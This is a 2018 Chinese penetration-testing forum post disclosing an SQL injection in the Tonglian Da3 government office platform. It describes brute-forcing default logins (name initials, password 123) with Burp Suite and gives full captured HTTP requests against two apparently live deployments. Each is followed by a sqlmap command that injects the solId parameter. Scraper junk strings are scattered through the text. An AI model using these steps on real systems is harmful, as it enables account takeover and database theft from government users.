中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin 时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

5 c& f7 f5 Z; }& q8 v: P
8 w3 s7 t* O0 @( A* ]4 v

1 {# Z: \5 l% a0 Q4 |$ j8 Y 平台简介：5 a5 o, V; y, q# X+ F/ [& _

9 N$ |. r+ g: C, v; G2 o+ x : T& ]0 r8 T, P3 h

/ ?: r( U3 P9 |8 V. |* x 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; F7 x* s) I$ e9 @, M, X* w) Z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 }9 {0 \6 @6 O: s$ n% r9 W- p4 G同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ 5 h- k" L& i, d9 R% F

# A% j4 }) Q3 A" V ' W- {, f( v! e1 \. O! V& a) \

# l9 m$ r& ?% ~7 j' ^- ` 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：) s) |+ _# v+ T

) `! t, q! V9 \/ O( C9 P ( R* k$ l; {, k0 R) C7 d, `0 o

, u7 Q( D6 o" t- G4 ` http://1.1.1.1:7197/cap-aco/#（案例2-） & Q5 n/ j1 ]' p9 D5 m& K

0 X7 e2 p+ \- x0 N3 M http://www.XXOO.com （案例1-官网网站）5 R7 z- Z M! V2 r9 U

/ ?8 G$ ~4 D. N 7 R6 [" p: r! W7 |' e' L

* ~( ~$ U3 b5 I( [8 Z% ~5 _ 漏洞详情:1 A3 o, F2 `& a

5 Z5 F; g! k1 j. I 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试5 ^ d* e. l0 q" F/ m% j

0 C& @1 j$ h7 \9 } 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图： 9 x7 i1 h8 v. ~

- N) c3 z2 B# z: Y 6 u8 h4 s ~/ ~" Y' Z

e9 ^8 z+ }( c: `+ D3 Z a" \ k* a / C; w" a) e: t; O5 A; i! G: t

, J: a# c5 O5 I6 d7 o) G3 r! Z status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： " X3 ]2 c* `, [; j5 ^

1 z& s! A* \2 r/ e: ~, q } U: K 1、案例1-官方网站9 w2 z: v. \ c. O9 |) D3 o

, V8 H2 z- W/ Q3 L4 m( _ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 1 [9 s2 E+ b7 y" x: {1 x

3 N# w6 G( ^6 n5 X# ]) A Host: www.XXOO.com6 z. [) d9 ?, H

) n& g8 ]3 _ ]- T! _" v Proxy-Connection: Keep-Alive ; K" z% F$ q# j) f* T

+ t+ z$ k6 h5 K/ ?, z' I1 \, l Accept: application/json, text/javascript, */*; q=0.01 . c, ` N: U/ m4 P& `6 C4 N1 o

R! m \4 |1 B. T; Q# B6 i Accept-Language: zh-CN' w/ V$ q3 K0 [+ s1 {* D9 q1 u

/ Q! Q2 Y* c+ I4 L \ Content-Type: application/json ; M$ n% d" ^6 H) M. ~+ R3 f( W

& v2 K+ u/ z4 V5 E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko; z+ q' j' W% ~$ }3 F% h

3 n/ Z* A5 r+ {8 j$ u; { X-Requested-With: XMLHttpRequest + E, M k9 d7 `' ]9 i5 a+ ^

. q% [2 F" T# u5 j. O0 p @ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0028 k4 r& W( a# }7 A S+ h# |( F

% ?7 j* V# `' P) q Accept-Encoding: gzip, deflate, sdch 2 d$ m( J4 ^) E4 J

# f5 {: _. ^# H7 s! n Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e% @; t; W/ d# }- r- p. v% H2 R H$ b

3 x1 |0 w5 v7 x6 D' k 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: # J" ], k3 d9 z. J+ U: \- h/ ]

0 l; F9 L t! \! B L 7 \* G; P; K# l8 _5 K9 p

+ [- O5 F# {* E4 _! \! s0 n2 X+ } 2 o5 E7 T5 f/ e, ]

/ [( |% _3 @9 ~, E% f0 i8 }9 d 1 U1 @( b: [! h

' p* G: w# E5 ^ R& z p 1 k/ z. X$ u1 [& X8 W& m

2 s G1 x; V: I M( y0 M D6 L: }" ~

3 J- P4 `0 C6 D6 \, R- k" N& Q5 _ 2、案例2-某天河云平台 ! k/ o6 C4 C7 ~: @

/ Z2 x9 P: ~0 ` z# Y% X GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 5 h; k3 F( f0 w

- g$ t3 L' `0 x- f' I8 K, U5 k, z Q Host: 1.1.1.:7197 8 Q' [: U3 u3 x g, [$ h7 n

& m( ?1 A8 x& G0 |, n6 M Accept: application/json, text/javascript, */*; q=0.01 ) P2 s2 d: W5 |/ m/ t

5 `3 ^( `6 ^3 k* ^ B( c8 z4 v X-Requested-With: XMLHttpRequest ! @5 {3 u* H7 U2 j/ G6 Z

/ Y' L8 l T9 |8 V, b! O8 h User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 8 G1 \) s8 H0 F5 h$ @

) X/ S4 Q0 N8 I4 }9 }. @ Content-Type: application/json1 p' h. u1 b/ `7 E. K) n4 b

6 W$ N6 W% [5 {4 x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 + U4 {3 E6 {# o f3 m% _

3 H% k, H' m( [ Accept-Language: zh-CN,zh;q=0.8 4 a( J* n( K7 V9 L; U7 w

( m# f% T y7 c+ b: z7 J Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 - ~/ z( U& q" y% o/ S

: u; R _0 ], L& ] Connection: close' a- j' r# s- \! e: i8 g/ q

$ ?. A% D( P; h' }4 t 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: l. X: ?7 r+ ^

* k% M8 ~/ ~- g) a( W+ T1 D7 _0 ^ ; ?( C, `2 G2 `

3 G# d' o3 J& C3 S# L/ i
+ r* h" D1 B; L4 Y! n* c* `

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)